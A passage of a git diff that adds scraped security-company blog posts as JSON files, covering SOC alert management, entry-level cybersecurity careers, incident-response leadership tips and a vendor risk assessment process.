a manager, I ask a ton of questions about the alert management process: How many alerts did we send to the team last month? How many alerts will we send to the team next month? What day of the week is the busiest? Do we get more alerts during the day or at night? How many alerts will we send to the team next year? All of these questions are centered around time . Time series analysis allows you to analyze data in order to learn what happened in the past, and to inform you on what things will likely look like in the future. By performing time series analysis you can forecast how things will change and react before it\u2019s too late. We perform time series analysis on the historical volume of alerts sent to our team for triage. From this data, we pull out different components including trend , seasonality , and the noise AKA \u201c the residual ,\u201d so that we can use patterns from historical behavior to help us predict future behavior. This allows us to not only more deeply analyze what\u2019s already happened, but it\u2019s also a way to look into the future so you can start to react now before it\u2019s too late. 7. Measure quality I love this tweet. Quality control doesn\u2019t get in the way. It pushes you forward. At Expel, we use a quality control (QC) standard, Acceptable Quality Limits (AQL), to tell us how many alerts and incidents we should review each day. We then randomly select a number (based on AQL) of alerts, investigations and incidents and review them using a check sheet . QC allows us to spot problems, understand them and then fix them. And fast. Parting words I\u2019ll be candid. At one point I thought about rebranding our SOC as a Computer Incident Response Team (CIRT) to distance ourselves from all the general negativity associated with a SOC. But a SOC can be a great place to work if you solve problems the right way and empower your teams. As an industry, let\u2019s \u201cSOC\u201d the right way and reshape everyone\u2019s thinking about SOCs." +} \ No newline at end of file diff --git a/a-beginner-s-guide-to-getting-started-in-cybersecurity.json b/a-beginner-s-guide-to-getting-started-in-cybersecurity.json new file mode 100644 index 0000000000000000000000000000000000000000..5397752471a20f2da9318994b122c32031b2ed5e --- /dev/null +++ b/a-beginner-s-guide-to-getting-started-in-cybersecurity.json @@ -0,0 +1,6 @@ +{ + "title": "A beginner's guide to getting started in cybersecurity", + "url": "https://expel.com/blog/a-beginners-guide-to-getting-started-in-cybersecurity/", + "date": "May 31, 2018", + "contents": "Subscribe \u00d7 EXPEL BLOG A beginner\u2019s guide to getting started in cybersecurity Talent \u00b7 9 MIN READ \u00b7 YANEK KORFF, BEN BRIGIDA AND JON HENCINSKI \u00b7 MAY 31, 2018 \u00b7 TAGS: Career / Guide / How to / NIST It happens from time to time. Someone tweets something incendiary, it creates a hubbub and before long you\u2019ve got yourself a veritable online brouhaha. One topic that seems to have piqued everyone\u2019s interest lately is this question: is there such a thing as an entry-level security job? It\u2019s a good one. And there seem to be two schools of thought: Never start off in security. Start with IT infrastructure, helpdesk, or development. Don\u2019t waste time, dive into security and fill in the technical gaps as you go. Here at Expel, we agree with Dino\u2019s philosophy . First of all, start anywhere you damn well want to start. \u201cFocus on what you want to do , versus what you want to be . Then, focus on finding the best place to do that and stay there.\u201d We\u2019ve seen it first hand. We\u2019ve hired several analysts straight out of college, and they\u2019re doing excellent work (If you\u2019re an employer and not plugged into the community at the Rochester Institute of Technology , and specifically working with their Computer Security program, you\u2019re definitely missing out). So we know there are degree programs out there that will prepare you for security jobs right off the bat. Now that you know where we stand, we\u2019ve got some tips on how to break into security . But there are lots of different jobs with the title \u201csecurity\u201d in them (and lots of jobs involving security that don\u2019t have \u201csecurity\u201d in the title) so it\u2019ll be important to make sure we know which ones we\u2019re talking about. Which cybersecurity jobs are we talking about? Wouldn\u2019t you know it, not only does NIST have a pretty great cybersecurity framework to help you manage risk , they\u2019ve also got another nice framework that can help job seekers figure out what employers are looking for. A good first step towards finding the work you want to do is to identify the tasks that float your boat and map them to jobs that give you the opportunity to do just that. Worried you don\u2019t have the technical depth for some of these roles? Entirely possible! If you drill into the framework a bit you\u2019ll see some jobs (like Cyber Defense Analysis , which we call a \u201cSOC Analyst\u201d) have an enormously long list of knowledge areas you\u2019ll need to be proficient in. If that\u2019s the kind of job you want to do, it might make sense to start off with a less technically demanding role that has a lot of the same baseline prerequisites like an IT Program Auditor . You could use that as a stepping stone into other security roles as you develop a deeper understanding of the security space. And yes, you could certainly start with a role in Systems Administration or Network Operations to gain technical chops too. \u201cWait a sec,\u201d you might be thinking to yourself, \u201cisn\u2019t this just a cop out by defining non-security roles as security?\u201d Yes, it absolutely is. You got us. Frankly, as the NICE Framework makes clear, security is extraordinarily broad. While some argue it\u2019s \u201cniche,\u201d it\u2019s really a compendium of niche knowledge across several vastly different work areas. That means if your mind (or your heart) is set on security, you can enter any of these domains and work your way into security. Or \u2026 you can start in security-specific domains and work your way into more technical roles over time. Okay, so maybe you buy into the argument that the security domain is pretty diverse. Maybe you go one step farther and believe several of these roles include security responsibility even if they don\u2019t have \u201csecurity\u201d in their title. After all, we\u2019ve been saying that security needs to be built-in , not a bolt-on for years, right? Perhaps what\u2019s going on here is that the online brouhaha around \u201centry-level security jobs\u201d is really focused on the security jobs where technical depth is essential. Maybe the argument is it\u2019s these jobs that require starting out in technical non-security roles first. Let\u2019s poke at that a bit. But first, there are a few things that\u2019ll apply no matter what direction you\u2019re coming from. Let\u2019s try to agree on three things Anyone can cook Have you seen the movie Ratatouille ? No? Yeah, that seems to be the most common answer. Ok, let\u2019s summarize [SPOILER ALERT]. There\u2019s this Chef, Auguste Gusteau, who authors \u201c Anyone Can Cook .\u201d Throughout the movie, you\u2019re made to believe that the message of the book (and the movie) is that literally anyone can become a great chef. Even the protagonist, a rat, can do it because you can learn how to do it from a book. Yet, by the end of the movie, you realize the point is substantially more profound and realistic. Actually, no. Not everyone who picks up the book can become a great chef. But, in fact, a great chef could potentially come from anywhere. There are so many paths to \u201csuccess.\u201d There are exceptions to every rule. Anyone can cyber. \u201cNever\u201d is rarely the right word A few years ago one of us was walking up Main Street, USA at the Magic Kingdom. It was 8:30am and he refused to buy his younger daughter funnel cake first (oh, the humanity!) \u201cYou never buy me anything!\u201d she exclaimed. He stopped. He looked around. He kept walking. The notion that you should avoid absolutes isn\u2019t new. And in the tech space, it\u2019s particularly important. A great engineer and former colleague once said: \u201cWhen the customer says it never happens, we need to build support for it to happen 5-10% of the time.\u201d So we\u2019re going to be cautious about these words when we\u2019re talking about career paths too. Broad-scale discouragement is a Bad Thing\u2122 When you engage in an argument or even a mild discussion, there\u2019s a decent chance your conversation partner is already coming to the table with an opinion. If it\u2019s a strongly-held opinion, your counter-argument may actually galvanize their original belief . In that case, your discouragement is going to fall on deaf ears \u2026 so why bother? In other cases, people may have a more flexible mindset. Think about a scout versus a soldier mindset. To a soldier, everything is black and white. Good and evil. Kill or be killed. Compare that to a scout, who\u2019s in information gathering mode all the time. Drawing conclusions are some general\u2019s job. Discouragement, in this case, could actually be effective! So good job, you\u2019ve managed to discourage a portion of the population who could actually have been amazing contributors in the field. What harm is there on succeeding or failing on one\u2019s own merit? Why encourage people to punt on first? Five habits that are helpful for (entry-level) security jobs If you don\u2019t agree with the three items above, well \u2026 it might be a good idea to stop reading now because we\u2019re about to do some hardcore encouragement , and that might make you grumpy. After all, the next great information security practitioner could be reading this blog right now. Also, we promised in the title to explain how to get into cybersecurity. So here are a few practical next steps. There are all sorts of resources out there that\u2019ll help you on the path towards becoming a super-nerdy cyber superhero. Here\u2019s our list of five things you can do to take the first steps to an entry-level technical cybersecurity career. 1. Survey the field Follow influential cybersecurity evangelists on Twitter. The most successful ones probably aren\u2019t calling themselves cybersecurity evangelists. They\u2019re just constantly dropping knowledge bombs, tips and tricks that can help your career. Here\u2019s a short list to get you going: @bammv , @cyb3rops , @InfoSecSherpa , @InfoSystir , @JohnLaTwC , @armitagehacker , @danielhbohannon , @_devonkerr_ , @enigma0x3 , @gentilkiwi , @hacks4pancakes , @hasherezade , @indi303 , @jackcr , @jenrweedon , @jepayneMSFT , @jessysaurusrex , @k8em0 , @lnxdork , @mattifestation , @mubix , @pwnallthethings , @pyrrhl , @RobertMLee , @ryankaz42 , @_sn0ww , @sroberts , @spacerog , @subtee , @taosecurity 2. Combine reading and practice This may shock you, but there\u2019s this security company called Expel that has a bunch of great content (full disclosure: we\u2019re biased). Self-serving comments aside, there are several companies that produce high-value security content on a pretty regular basis. High on our list are CrowdStrike , Endgame , FireEye , Kaspersky , Palo Alto\u2019s Unit 42 , and TrendLabs . As you read, try to figure out how you\u2019d go about detecting the activity they describe. Then, how would you investigate it ? Are you looking to grow your technical foundation for something like an analyst role? The breadth of what you need to know can be daunting. Perhaps the most foundational knowledge to pick up is around the TCP/IP protocol suite . Be prepared to answer the \u201c what happens when \u201d question confidently. For learning about endpoint forensics, you probably can\u2019t get a better foundation than Incident Response and Computer Forensics 3rd Edition . The chapter on Windows forensics is gold. Dive into Powershell , associated attack frameworks , and learn how to increase visibility into PowerShell activity with logging. Pair this knowledge with some of the best free training out there at Cobalt Strike. Watch the (most excellent) videos and apply the concepts you\u2019ve learned as part of Cobalt Strike\u2019s 21-day trial. Not enough time? Consider making the investment. The Blue Team Field Manual and Red Team Field Manual round out our recommendations on this front. In parallel, set up a lab with Windows 7 (or later) workstations joined to a domain. Compromise the workstation using some of the easier techniques, then explore post exploitation activity. Your goal is to get a feel for both the attack and defense sides of the aisle here. On the network side, consider The Practice of Network Security Monitoring , Practical Packet Analysis , and Applied Network Security Monitoring . When it comes time to take some of this book learning and make it real, resources like the malware traffic analysis blog and browsing PacketTotal where you can get a sense for what\u2019s \u201cnormal\u201d versus what\u2019s not. Your goal here should be to understand sources of data (network evidence) that can be used to detect and explain the activity. To refine your investigative processes on the network, consider Security Onion . Set up some network sensors, monitor traffic and create some Snort/Suricata signatures to alert on offending traffic. Your goal is to establish a basic investigative process and like on the endpoint side, understand both the attack and defense sides of the equation. 3. Seek deep learning, not just reading Have you ever taken a class and then months later tried to use the knowledge you allegedly learned only to discover you\u2019ve forgotten all the important stuff? Yeah, if you disconnect learning from using the knowledge, you\u2019re going to be in a hard spot. This might be one of the biggest challenges in diving into a more technical security role up front. To help offset this, in addition to combining reading with practice, consider the Feynman technique . Never heard of it? Well, it\u2019s easy to skim over bits and pieces you don\u2019t understand \u2026 but if you can distill it down into simple language such that others could understand it, then you\u2019ll have understood it better in the process. Nothing helps you learn quite like teaching. 4. Develop a malicious mindset Years ago, a security practitioner was explaining how you can become a better defender by thinking like an adversary. The story came with some awkward (and humorous) interchanges. He walked into a hotel room with his family while on vacation, saw the unsecured dispenser installed into the shower wall and said out loud, \u201cWow, it would be so easy to replace the shampoo with Nair!\u201d His family was horrified. To be clear: we\u2019re not advocating that you replace shampoo with Nair, or similarly nefarious anti-hair products. And the concept of thinking like an attacker is not new. Eight years ago when Lance Cottrell was asked what makes a good cybersecurity professional, he said they put \u201cthemselves in the shoes of the attacker and look at the network as the enemy would look at the network and then think about how to protect it.\u201d The best way to do that these days is by wrapping your head around the MITRE ATT&CK framework . It\u2019s quickly becoming the go-to model for wrapping some structure around developing an investigative process and understanding where (and how) you can apply detection and investigation. You might want to familiarize yourself with it prior to doing extensive reading and then come back to it from time to time as needed. 5. Be dauntless Don\u2019t let your lack of knowledge stop you . There are organizations out there willing to invest in people with the right traits and a desire to learn. Apply for the job , even if you don\u2019t think you\u2019re qualified. Maybe you get a no. So what? Try again at a different company. Or try again at that same company later. Reading will only get you so far \u2026 applying your knowledge will get you to the next level. And guess what, remember that Feynman technique? Yeah, teaching that knowledge you\u2019ve acquired to others will get you one level farther. Good luck, happy hunting! Finally \u2026 to those who say \u201can IT background and deep technical skills will help you get a job in security,\u201d we say: \u201cWe agree!\u201d And \u2026 To those you say \u201csecurity roles can be broad and you can use them to develop technical expertise over time,\u201d we say: \u201cWe also agree!\u201d What we don\u2019t believe in is telling people we don\u2019t know that they can\u2019t do something without understanding their unique situation. There may be paths that are generally easier, or generally harder. But assuming you can\u2019t do something is headwind you don\u2019t need. Hopefully you\u2019ve found some guidance here that gives you the push you need to consider an entry-level (or later) security job and you\u2019ll apply. To that end, we say \u2026 best of luck!" +} \ No newline at end of file diff --git a/a-cheat-sheet-for-managing-your-next-security-incident.json b/a-cheat-sheet-for-managing-your-next-security-incident.json new file mode 100644 index 0000000000000000000000000000000000000000..915a9d62330c3c02bd70cdc23c6ea374c3660df2 --- /dev/null +++ b/a-cheat-sheet-for-managing-your-next-security-incident.json @@ -0,0 +1,6 @@ +{ + "title": "A cheat sheet for managing your next security incident", + "url": "https://expel.com/blog/cheat-sheet-managing-next-security-incident/", + "date": "Aug 24, 2017", + "contents": "Subscribe \u00d7 EXPEL BLOG A cheat sheet for managing your next security incident Tips \u00b7 5 MIN READ \u00b7 BRUCE POTTER \u00b7 AUG 24, 2017 \u00b7 TAGS: Planning / Security Incident Surviving the unexpected. On the face of it, security is pretty straightforward. We\u2019re operating in one of two modes. In Mode A we\u2019re focused on keeping evildoers at bay (and other generally bad things from happening). In Mode B the bad things have happened and we\u2019re doing the best we can to manage them. For most people A > B. But we don\u2019t get to choose when the bad guys show up. When they do , we\u2019re often out of practice because we have so much less experience responding to attacks than we do preparing for them. In a perfect world, there\u2019s a comprehensive incident response plan that involves legal, communications, the board, and technical response processes. In an even more perfect world, you\u2019ve put that plan through a table-top exercise, refined it based on your learnings, and drilled it to the point of muscle memory. But few of us live in that perfect world. That\u2019s OK. All is not lost. If you haven\u2019t yet got that perfect incident plan in place you can still make the best of a bad situation and manage your organization back on level ground. Here are six things I recommend. 1. Control your emotions and the velocity First and foremost, it\u2019s important not to freak out. Your job is to manage the incident in front of you and return the organization to \u201cnormal.\u201d Letting your emotions get the better of you will just get in the way of reaching that goal. It may be difficult to settle your emotions, but there are ways to help. First, get organized by putting a set of facts and tasks together to help you focus on the event at hand rather than the emotions surrounding it . Also, take care of yourself. Eat. Rest. Don\u2019t be afraid to take a step back (or a walk around the block) once in a while. It will help you maintain perspective and control your emotions. Pace of response is also important. You need to drive response activities but \u2013 like Icarus \u2013 you\u2019ll only be successful if you stay away from the extremes. Move too fast and you\u2019ll have wasted work, missed opportunities and poor decisions that could make you look like the Keystone Cops . Move too slowly, and you\u2019ll jeopardize the integrity of your organization as attackers continue to have access and do damage. There\u2019s no clear rule of thumb here, but as each meeting goes by and each day passes, make sure you\u2019re thinking about the velocity of activities and adjust tasking appropriately. 2. Build a team and assign roles You can\u2019t respond to an incident all by yourself. No matter how big or small your organization is, you need help. Build a team that\u2019s appropriate for the response and assign everyone discrete roles. Without roles, you\u2019ll have people stepping on each other\u2019s toes and gaps where there should be work. You\u2019ll want to engage legal, communications, key executives, IT leaders and technical staff. Make sure each person knows what they\u2019re expected to do, the level of effort and the need for confidentiality. But be careful. Don\u2019t bring in too many people \u2013 especially if you\u2019re dealing with an insider incident. Controlling information gets harder as more people get involved. So, think carefully about who you involve when insiders are involved. 3. Communication is key Regular meetings are important to keep everyone on the same page. You\u2019ll be bringing together individuals from across the organization. They don\u2019t normally work together and they won\u2019t be familiar with each other\u2019s communication styles or skills. By meeting at least once or twice a day, you\u2019ll help the team integrate rapidly and ensure your response activity doesn\u2019t suffer from lack of information sharing. And while internal communication is critical, make sure you\u2019re also looking beyond your own four walls to your customers, vendors, board, and the public at large. Controlling the message while an incident is unfolding is difficult. And it shouldn\u2019t be your responsibility \u2013 not just because you\u2019re busy, but because you are probably not good at it. Being transparent but also communicating facts externally in a way that is consistent with your brand is complicated. Educate your communications staff about the incident and hold them accountable to message with the appropriate parties. 4. Don\u2019t jump to conclusions Nothing is worse than a public statement about an incident that later has to be completely changed because an organization made an assumption during an incident that turns out to be false. I was once pulled away from a vacation with my family because my corporate website was \u201cunder attack\u201d according to our network operations center. We spent half a day working with that hypothesis, trying to shore up our DDoS defenses and control traffic. When we actually stepped back and looked at the facts, we discovered our marketing department had launched a new ad campaign without telling IT. It was swamping us with new users. Within a few minutes, we contacted marketing and had them turn the dial down to levels our infrastructure could handle. Deal with the facts you have, not the facts you want or the assumptions you brought to the table. Jumping to conclusions without sufficient facts damages your creditability with stakeholders. More important, it can lead to poor assignment of resources and cause greater harm to your organization as attackers are allowed continued room to operate. 5. Save the post-mortem for the actual \u201cpost\u201d While you\u2019re figuring out \u201cwhat\u201d happened, it\u2019s often easy to drift into thinking about \u201cwhy\u201d it happened. Assigning blame and tracking down the root cause of an incident may seem like a good idea, but it can inflame emotions and distract you from the task at hand. If you see your teammates diving into the \u201cwhy\u201d of the incident, remind them that the team will do a post-mortem after the incident and ask them to stay focused on their tasking. Usually, the promise of the post-mortem is enough to keep things on track. Then, once the incident is resolved, make sure you actually do the post-mortem analysis. Addressing the root cause of an event is important to the long-term integrity of your organization. Give everyone a few days to rest and deal with their normal job functions, but try to have a post-mortem meeting within a week after the event. 6. Start building a real incident response plan When the dust has settled, sit down with all your notes, emails, and random facts. Marvel that you were able to deal with such a complex situation with nothing but your wits and your skills. And vow to never, ever do it like that again. Creating a solid incident response plan will ensure that when things go wrong again (and they will go wrong) that your organization is better prepared to deal with the event. Did you notice something? None of these recommendations are overly technical. In my experience, when incident response goes wrong it\u2019s not because there wasn\u2019t competent technical staff. It\u2019s because there was no clear leadership for the staff to follow. \u2014 So today, while you\u2019re still working on your full incident response plan (and before anything bad has happened) let me offer a three-minute plan and a three-hour plan that will leave you better prepared to manage your organization the next time you face an incident. If you\u2019ve only got three minutes: get your phone out, make a list of the people across the organization that you\u2019ll need to work with if an incident happens and make sure you have them on speed dial. If you\u2019ve got three hours go a step further: set up meetings with each of them and tell them what their role would be if an incident ever arises. Trust me, the time you spend doing this will be paid back tenfold when that time is most valuable \u2013 during your next incident." +} \ No newline at end of file diff --git a/a-common-sense-approach-for-assessing-third-party-risk.json b/a-common-sense-approach-for-assessing-third-party-risk.json new file mode 100644 index 0000000000000000000000000000000000000000..4c804f797ea4b13ec17197b1533e1395181c0806 --- /dev/null +++ b/a-common-sense-approach-for-assessing-third-party-risk.json @@ -0,0 +1,6 @@ +{ + "title": "A common sense approach for assessing third-party risk", + "url": "https://expel.com/blog/a-common-sense-approach-for-assessing-third-party-risk/", + "date": "Jul 26, 2018", + "contents": "Subscribe \u00d7 EXPEL BLOG A common sense approach for assessing third-party risk Security operations \u00b7 12 MIN READ \u00b7 BRUCE POTTER \u00b7 JUL 26, 2018 \u00b7 TAGS: Example / How to / Planning \u201cHow secure is your supply chain?\u201d It\u2019s a question that can strike terror into the heart of a CISO \u2013 even one who\u2019s in charge of a mature security organization. With the move (sprint?) to cloud-based infrastructure, and business departments subscribing to SaaS apps left and right (\u201cOops! was I supposed to tell IT?\u201d), every day we rely more and more on other peoples\u2019 services to serve our customers. Here at Expel, we\u2019re a \u201ccloud first\u201d organization. Our entire enterprise\u2019s physical infrastructure fits easily on one desk. But we use the capability of nearly 50 vendors to bring our services to our customers. That\u2019s a lot of infrastructure that\u2019s not ours. And we\u2019re a relatively small company. Large companies may depend on hundreds of outside services. Understanding how all those services keep their customers (meaning \u2026 you) secure is no trivial matter. But it\u2019s super important. CISOs manage cyber risk in their own infrastructure every day. But once you leave your own infrastructure, it gets harder. And there aren\u2019t a lot of playbooks for how to manage the risk of someone else\u2019s infrastructure. Third parties are out of your control. You give them money, they provide a good or service in return. Sometimes, there\u2019s even contractual language that says \u201cwe\u2019ll do our best to secure your data.\u201d But, in practice, those words don\u2019t really mean much. What matters is the practices, procedures, and policies your vendors follow. At Expel, like many companies, we\u2019ve created a third-party assessment program for our vendors to try to manage our supply chain risk. We\u2019ve used other companies\u2019 third-party assessment programs as input, consulted our vendors and done a lot of research. It works well for us, and so we\u2019re sharing it with you, along with the third-party risk assessment questionnaire we\u2019ve developed. Watch the video overview \u2026 or keep scrolling to read on First \u2026 be realistic about who chooses your suppliers Unfortunately (at least for CISOs), security doesn\u2019t control who the organization does business with. Business owners do. And the questions they have on their mind are very different than what most CISOs are wondering. As you roll your program out, it\u2019s important to understand the business owner\u2019s mindset so you can figure out when, where and how to insert your own process into theirs. When a business owner has a problem, they probably want to fix it fast. They want to know if the product or service they\u2019ve got their eye on will do the trick. If the answer is \u201cyes\u201d (and they\u2019ve got the budget) they\u2019ll move forward, negotiating contracts, agreeing on cost and ultimately making the purchase. Meanwhile, the CISO is thinking, \u201cDoes this vendor create an acceptable level of risk?\u201d Getting answers means acting fast \u2013 while the business owners are chasing down answers to their own questions. If a potential vendor doesn\u2019t address security in a way you\u2019re comfortable with, the sooner you know that the better. It\u2019s much easier to guide the business away from potentially toxic companies early in the process than to stop a contract that\u2019s gone through all the redlining and negotiation and is one inch from the finish line. Next \u2026 set realistic expectations (aka understand the constraints) Setting realistic expectations for your third-party assessment program requires understanding two important equations that\u2019ll govern how much time you and your vendors are willing to put in. They seem simple. But it\u2019s easy to get so caught up in the weeds perfecting your process that you lose sight of them. Violate equation number one and vendors will start stretching the truth to get through all of your questions or bury the bad stuff to try and get your business. Violate the second equation and you\u2019ll find yourself giving away a free risk assessment or pen test to every potential vendor (more on that later). Remember, SaaS providers are getting bombarded left and right with third-party assessments. Short, easy questionnaires will get their attention before long complex ones. Likewise, you don\u2019t have a lot of time to dedicate to this either. The more complex the questions, the longer you\u2019ll have to spend vetting the results. Short, simple and to the point is far more likely to get to a result that\u2019s useful \u2013 both for you and your vendors \u2013 than some crazy, multi-page questionnaire. Keeping things simple has multiple benefits. When in doubt, use the \u201c50 at 50\u201d rule Striking the balance between thorough yet brief, reminds me of a saying from when I used to crew for a friend that raced cars out in West Virginia. The sanctioning body for the races required that cars be painted in a professional manner. Anyone that\u2019s been around amateur racing knows that very little about it qualifies as \u201cprofessional.\u201d The rule of thumb the officials used was \u201c50 at 50\u201d\u2026 that is, when you looked at a car traveling 50 miles per hour from 50 feet away, did the car look like it was painted? If the answer was \u201cyes,\u201d you were good to race. That\u2019s sort of how I view third-party assessments. If your process gives you the same level of assurance about your vendors\u2019 security processes as \u201c50 at 50\u201d gives racing officials, you\u2019re doing things right. Sure, there are some situations that require far more diligence than that (stay tuned!), but in most cases, you\u2019re just trying to get a general feel for things. Ultimately, even organizations with great practices and procedures will screw up sometimes. Nothing you do in your third-party assessment program will change that. The common sense process for third-party assessments There are three big chunks to any third-party assessment program: creating the questionnaire, designing the process and running it (told you it would be \u201ccommon sense\u201d). Of course, not every situation will fit neatly into your process. We\u2019ll cover the outliers too. But, to get started, you need to create your questionnaire. 1. Creating your questionnaire The questions you ask your vendors will be taken seriously by them \u2026 or at least they\u2019ll look at them seriously and try to figure out what you mean. It\u2019s important to write crisp, clear questions that vendors can easily understand and have a clear way to answer. The meat of your questionnaire is the questions themselves. We\u2019re providing our third-party risk assessment questionnaire as a starting point for you. Hopefully this\u2019ll let you speed through this step. We like these questions because they cover a wide swath of cybersecurity without being too detailed. They\u2019re also aimed at making it easy for vendors to re-use work they\u2019ve already done. Asking about existing certifications and the results of previous testing reduces friction in the process. Really, we want to ask questions we think will get answered truthfully and quickly. Focusing on reuse is one strategy for that. We\u2019ve also designed our questionnaire to sleuth out how much thought and care a vendor has put into security in general. For example, when we ask \u201cDo you have a formally appointed information security officer?\u201d we get a different vibe when the answer is \u201cYes, here\u2019s our CISO\u2019s contact info,\u201d versus \u201cNot really. Our lead developer cares a lot about security though.\u201d Simple questions like this give you a great window into how a potential vendor thinks about security. 2. Building the process Developing the questions is only one piece of the prep work that you\u2019ll need to do. How you\u2019re actually going to manage the process is equally important. The process we\u2019ve designed breaks down into the following six steps. Your exact process will, no doubt, have to be tailored a bit to the way your organization buys products and services. We\u2019re not suggesting that you can do a direct cut-and-paste of our process. But hopefully it can be an advanced starting point for you. Here\u2019s a quick overview of how we thought about each step as we created our own third-party assessment process. Step 1: Kicking off the process We created a set of criteria to determine which external vendors need to go through the process. Vendors that make the cut include: Services that will impact production systems Services that contain customer or other sensitive data Systems which aggregate data from multiple data sources. If someone is trying to use a new service that fits one of these situations, they send a request for review to a security review email alias containing what the service is, how we\u2019re going to use it and provide points of contacts at the vendor. Step 2: Send an introduction It\u2019s a bit awkward to send an email to a potential vendor demanding a bunch of information without first introducing yourself, the process and what they should expect. At Expel, the first thing we send to the vendor is a cordial email describing our process, the relatively casual and light touch nature of it and an invitation to ask questions or engage if they have concerns. We also let them know our desired timeliness (usually we ask for a response within about two weeks). Step 3: Send the real email Next, we send the real email. We use our secure file sharing system to send this email so that all communications are encrypted and their response is protected on its way back to us. You don\u2019t have to do this, but it\u2019s advisable, especially if you\u2019re asking for copies of sensitive documents such as their SOC2 and pen test executive reports. Step 4: Send a reminder After a week and a half has gone by, we\u2019ll send a gentle reminder if we haven\u2019t heard anything. That\u2019s usually enough prodding to get us answers right under our two week request. Step 5: Receive and analyze the results Hopefully, when you get the vendor\u2019s answers back they make sense, are reasonably complete and if you\u2019re lucky they\u2019re even comprehensible. Sometimes we\u2019ve had to go back to ask vendors for clarification on an answer or two, and that\u2019s OK. Keeping in mind the \u201c50 at 50\u201d mentality, once you have the answers, balance them against the business request and determine if you\u2019re willing to move forward with the vendor or if there are concerns that need to be addressed. Step 6: Brief the business owner(s) Once we\u2019ve got our heads around all of the vendor\u2019s answers, we give the business owner our opinion. When the results are positive, the conversations are easy. When we have concerns, that\u2019s when things get more difficult. It\u2019s a good idea in those cases to involve more people on the business side than just the requester (team leads, managers, etc.). You\u2019re going to get into a risk-oriented decision about how important this specific vendor is to the company and what the security risks are. The results of that meeting can vary wildly, but usually will fall into one of four buckets: Yep. Cool. Go for it. We can put in compensating controls to make up for lack of assurance in the vendor. We need a deeper dive to better understand the risks. No. Nope. Negative. Not going to use them. It\u2019s very important not to treat these decisions as binary. The reason you\u2019re doing a third-party assessment in the first place is to manage risk. Risk is a continuum, as it were, and you should treat your third-party vendor assessment process the same way. 3. Running the process Once you\u2019ve got your questionnaire and process figured out, test it on a few vendors. Be very up-front with them; let them know this is your first time trying out your third-party vendor assessment questionnaire and you\u2019d love feedback on both the material itself and the overall process. You\u2019ll find some vendors are well prepared for these kinds of requests and will have a team dedicated to answering them. Other vendors will respond with \u201chuh, this is the first time anyone\u2019s asked us about security.\u201d Be prepared for that and everything in between. Take any feedback you get and stir it inappropriately with the work you\u2019ve already done and your objectives for your third-party assessment program. After you\u2019ve tested the process on a few vendors (or later \u2026 run the process for a year or two), iterate. Feel free to change it up. As you grow, your risk appetite changes. As the state of the art of your vendors improves, you might want to modify your process to suit your needs. You don\u2019t need a forever \u201capples to apples\u201d comparison over the years. Rather, you need each response to provide you the information you need right now to make the decision that\u2019s in front of you. That information will change over time, and your process should too. Keeping track of the results You\u2019ll likely get lots of confidential documents back from your vendors when they reply to your questionnaire. You\u2019ll want to make sure you protect them according to the terms of any non-disclosure agreements you signed with them. Be sure to follow whatever your internal procedures are with respect to protecting that information. Also, we\u2019ve found that it\u2019s helpful to create one place to track all of the assessments \u2013 upcoming requests, active ones, and assessments we\u2019ve completed. We store all the responses, supporting documents and our notes in one place. We\u2019ve chosen Confluence for that since we use the Atlassian suite for a lot of our engineering and security workflow already. You should choose whatever makes sense in your organization. But be aware, you\u2019ll build up quite a pile of information quickly, so being organized early will pay off as your program grows. Hooking the process into the way your organization buys stuff Having a process is all well and good. But, unless you socialize it and have a clear way to plug it into the way your organization buys stuff, your third-party assessment program can quickly turn into shelfware. It\u2019s important to set the hook early in the process to get the best results. That hook can take many shapes: The procurement process: When a business unit requests a new PO, your purchasing department can simply ask, \u201cWhat does Security think of this?\u201d Knowing a PO won\u2019t be cut unless there\u2019s a clear answer to that question will force business owners to engage your process early so you\u2019re not playing catch up. Contract review: A slightly different take, but the same basic idea. When a contract is put in front of legal to review, they can ask, \u201cWhat does Security think of this?\u201d as well. Again, if business owners know they can\u2019t get through legal without clearing security, they\u2019re going to engage you early. That\u2019s just the way it is: Rather than have a specific gate, you can communicate with leaders and purchasers that new products and services are subject to a third-party assessment as part of doing business. If it\u2019s discovered that someone bought something without an assessment, There Will Be Consequences\u2122. Just like there are when people buy product outside of purchasing, right? Right? Whatever you decide, be sure to communicate it widely and often. New processes that affect how you buy services tend to take a while for everyone to understand and accept, so putting together a good PR campaign can\u2019t hurt your cause. Also, be sure the \u201chow to submit\u201d part of your process is clear. At Expel we use Jira\u2019s Service Desk as the portal where users can submit third-party assessment requests and track progress. We already use Service Desk for IT and other ticket tracking so it was an easy solution. YMMV and all that\u2026 be sure to choose a method of engagement that works for you and your company. Vendors that are bigger than your breadbox There may be times when the product or service you\u2019re evaluating is too big, too important or represents too much risk to apply the \u201c50 at 50\u201d rule. In these cases, you\u2019ll likely end up doing a more formal risk assessment to understand the risks they present in more depth so you can compensate for any issues you can\u2019t get the vendor to fix. Risk assessments are complicated (I addressed them in an O\u2019Reilly Security talk here if you\u2019re interested). They can be done either by your own staff or a third party. Either way, I have two points of caution: Don\u2019t give out a free pen test If you engage a third party to assess your vendor\u2019s product it\u2019s easy for your vendor to ultimately get a free pen test that you unwittingly pay for. So, if you hire a third party, make sure they\u2019re working on your behalf and use your business needs as the backstop for their work. That\u2019ll make sure the final product is geared towards you and your business, not the vendor and their product. Make sure you don\u2019t accidentally do a pen test or risk assessment The other common mistake when you dive deeper is you don\u2019t realize that you\u2019re diving deeper. You get the questionnaire back and you have questions \u2026 so you ask the vendor a few more questions. Things are clearer, but still not clear. So, you ask \u201cHey, can we take it for a test drive?\u201d You get their product, configure it, start testing it and suddenly realize you\u2019re doing a product assessment and you\u2019re already 40 hours into the process and probably have 80 more hours to go before you\u2019re done. As you start peeling back the onion be aware that you\u2019re doing it overtly and for a reason. Don\u2019t spend more time and effort on a third-party assessment than you need to. Oh \u2026 and make sure to avoid these common pitfalls Finally, there are a couple of other pitfalls you\u2019ll want to make sure you avoid as you launch (or refine) your third-party vendor assessment program. Adding to the questionnaire Be wary of asking too many questions or diving too deep. You\u2019ll quickly reach a point where vendors don\u2019t want to answer and it takes you too long to assess the results. It\u2019s not worth it. If you decide to do a full-fledged risk assessment, then by all means, dive in the deep end. But if you\u2019ve got a question you feel you must add to your questionnaire, find one (or two?) that aren\u2019t giving you any value and swap them out. Again, the simpler and shorter your questionnaire is, the more likely you\u2019ll get accurate and timely responses. Believing all the answers It\u2019s human nature to not want to fail tests. That applies to vendors responding to third-party assessment requests. They want to be as compliant as possible, so you can expect they\u2019ll take a few liberties in their answers. While it\u2019s unusual to find a vendor that flat out lies (saying they\u2019re SOC2 Type 2 compliant when they\u2019re not, for example), 